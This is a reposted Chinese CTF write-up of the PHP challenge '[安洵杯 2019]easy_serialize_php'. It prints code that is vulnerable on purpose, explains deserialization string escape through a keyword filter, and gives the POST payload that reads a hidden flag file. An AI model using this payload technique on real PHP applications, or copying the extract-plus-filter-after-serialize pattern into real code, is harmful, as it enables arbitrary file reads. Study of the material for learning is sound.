2. 程式人生 > 實用技巧 >CTF程式碼審計之[安洵杯 2019]easy_serialize_php

CTF程式碼審計之[安洵杯 2019]easy_serialize_php

阿新 發佈:2020-09-14

[安洵杯 2019]easy_serialize_php

考點:php反序列化逃逸

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION
 
["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET
 
['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info
 
);
    echo file_get_contents(base64_decode($userinfo['img']));
}

觀察可以找到

還有根據程式碼

可以知道 資料在序列化之後又進行了一次過濾,可能會造成序列化之後資料丟失

php反序列化逃逸

特性一:

反序列化

//輸入
<?php
$str = 'a:2:{i:0;s:5:"hello";i:1;s:5:"world";}';
var_dump(unserialize($str));
?>

//輸出
array(2) {
  [0]=>
  string(5) "hello"
  [1]=>
  string(5) "world"
}

但是如果在str後面加上某些字元

//輸入
<?php
$str = 'a:2:{i:0;s:5:"hello";i:1;s:5:"world";}abc';
var_dump(unserialize($str));
?>

//輸出結果相同,不影響反序列化的正常進行
array(2) {
  [0]=>
  string(5) "hello"
  [1]=>
  string(5) "world"
}

特性二:

//輸入
<?php
$_SESSION["user"]='flagflagflagflagflagflag'$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
echo serialize($_SESSION);

//輸出
a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

假如後臺有過濾機制,能讓 flag 替換為空

則輸出為

a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
//輸入
<?php
$str='a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}';
var_dump(unserialize($str));

//輸出
array(3) {
  ["user"]=>
  string(24) "";s:8:"function";s:59:"a"
  ["img"]=>
  string(20) "ZDBnM19mMWFnLnBocA=="
  ["dd"]=>
  string(1) "a"
}

可以發現SESSION陣列的鍵值img對應的值發生了改變,可以知道,過濾掉 flag之後,ZDBnM19mMWFnLnBocA== 代替了真正 base64的編碼,讀取了d0g3_f1ag.php的內容,之後的內容則被被忽略掉了。

題目

payload:

post:_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

再 替換為_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:2:"dd";s:1:"a";}回顯得到 flag

轉載自https://www.jianshu.com/p/8e8117f9fd0e 大佬的文章(侵權立刪)

相關推薦

CTF程式碼審計[ 2019]easy_serialize_php

[ 2019]easy_serialize_php 考點:php反序列化逃逸 <?php $function = @$_GET[\'f\']; function filter($img){

CTF程式碼審計[網鼎 2020 青龍組]AreUSerialz

[網鼎 2020 青龍組]AreUSerialz <?php include(\"flag.php\"); highlight_file(__FILE__); class FileHandler {

反序列化中的物件逃逸——2019 easy_serialize_php

一週沒寫部落格了,這裡簡單梳理一下反序列化的普遍知識點 反序列化的物件逃逸問題一般分為兩種~~,我先談一下自己的理解,首先是過濾函式分為兩種情況

[ 2019]easy_serialize_php

easy_serialize_php 考點:PHP反序列化的物件逃逸 PS:任何具有一定結構的資料,只要經過了某些處理把自身結構改變,則可能會產生漏洞

[ 2019]easy_web

檢視URL,發現img引數後面應該是base64加密,嘗試解碼 http://0ec6d84a-930a-4d8a-8aeb-10862f2da5ee.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd

刷題[ 2019]不是檔案上傳

解題思路 這不是檔案上傳嘛? 傳傳傳,各種傳 檔案上傳 1.MIME型別檢測繞過 設定為image/jpeg,無果

CTF程式碼審計BUU CODE REVIEW 1

BUU CODE REVIEW 1 考點知識:反序列化,md5繞過 魔術方法 __destruct(): 物件的所有引用都被刪除或者當物件被顯式銷燬時執行

CTF程式碼審計[HCTF 2018]WarmUp

[HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page)

BUUCTF-[ 2019]不是檔案上傳 wp

知識點:github原始碼洩露、程式碼審計、php反序列化 進入頁面後發現可以進行檔案上傳,嘗試上傳了一個1.txt檔案後報錯,於是上傳1.jpg檔案,顯示上傳成功後進入show.php檢視,發現檔案被重新命名

BUUCTF Misc [ 2019]Attack

BUUCTF Misc [ 2019]Attack 流量分析題,學到了一個新工具mimikatz mimikatz 在內網滲透中是個很有用的工具。它可能讓攻擊者從記憶體中抓到明文密碼。

BUU MISC刷題記錄 [ 2019]Attack

[ 2019]Attack 知識點 流量分析 lsass.dmp 做題過程 開啟流量包 流量包中有大量http、tcp包和一部分nbns、arp包,先看傳輸的東西有沒有問題

BUUCTF 2019吹著貝斯掃二維碼

吹著貝斯掃二維碼 1.題目概述 2.解題過程 開啟flag.zip看看 是個加密的zip,在註釋裡有一串貌似是base32的編碼,可能是密碼

2019第二屆MISC-secret

1,題目給了一個dump記憶體映象,使用volatility進行分析   (記憶體映象最好與volatility在同一目錄下)

2020年“”四川省大學生資訊保安技術大賽 Misc WP

一封情書 檔案下載:https://wwa.lanzous.com/ie6Ysgfblsb 01轉換 開啟總共9409,實際就是97x97的二值影象的值。利用Python提取txt檔案中的01數值為97x97的矩陣

JAVA程式碼審計SQL注入

JAVA程式碼審計SQL注入 https://saas.51cto.com/learner.html#/course/player?courseid=22486&lessonid=543974&fid=555147&type=FILE_PLATFORM&ctype=COURSE_PLATFORM&openStatus=undefi

淺談Phar反序列化漏洞利用:N1CTF 2021 easyphp & 2021 EZ_TP

Phar 什麼是Phar PHp ARchive, like a Java JAR, but for PHP. phar(PHp ARchive)是類似於JAR的一種打包檔案。PHP ≥5.3對Phar字尾檔案是預設開啟支援的,不需要任何其他的安裝就可以使用它。

2021--pwn ezstack

ezstack 檢視保護 發現是64位保護全開。 拖進ida檢視 可以看到明顯的格式化字串漏洞和棧溢位

PHP程式碼審計SQL注入

程式碼審計SQL注入 SQL注入攻擊(SQLInjection),是攻擊者在表單中提交精心構造的sql語句,改變原來的sql語句,如果web程式沒有對提交的資料經過檢查,那麼就會造成sql注入攻擊。

2022 pwn babyarm

上週剛學習了一下arm下的pwn,這次就碰到了 ​ 32位,開了NX、relro部分開啟 ​ 程式前面有個加密,當我們輸入的內容加密後與\"Sp5jS6mpH6LZC6GqSWe=\"相同,程式會給我們一個能來進行棧溢位read

程式碼審計原理程式碼執行

0x01 程式碼執行 PHP程式碼執行漏洞可以將程式碼注入到應用中,最終到webserver去執行,該漏洞主要存在於eval()、assert()、preg_replace()、call_user_func()、array_map()以及動態函式中